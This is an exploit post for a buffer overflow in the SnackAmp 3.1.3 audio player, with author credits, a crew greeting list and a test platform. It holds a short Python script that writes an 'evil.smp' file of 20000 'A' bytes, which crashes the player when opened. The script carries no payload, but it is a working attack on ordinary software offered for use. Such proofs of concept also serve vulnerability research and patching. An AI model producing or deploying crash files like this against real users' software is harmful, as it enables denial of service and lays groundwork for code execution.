# ######################################## # Exploit Title : SnackAmp 3.1.3 (smp) Buffer Overflow Vulnerability # Software link : http://www.softpedia.com/get/Multimedia/Audio/Audio-Players/SnackAmp.shtml, sourceforge.net/projects/snackamp/ # Version : 3.1.3 # Tested on : Windows XP SP3 English # Date : 6/07/2011 # Author : X-h4ck # Website : http://www.pirate.al , @PirateAL Crew , http://theflashcrew.blogspot.com # Email : mem001@live.com # Greetz : Wulns~ - IllyrianWarrior - Danzel - Ace - M4yh3m - Saldeath - bi0 - Slimshaddy - d3trimentaL - Lekosta - Pretorian - CroSs - Rigon # ######################################## #!/usr/bin/python filename = "evil.smp" junk = "\x41" * 20000 FILE = open(filename, "w") FILE.write(junk) FILE.close() print "Evil file created"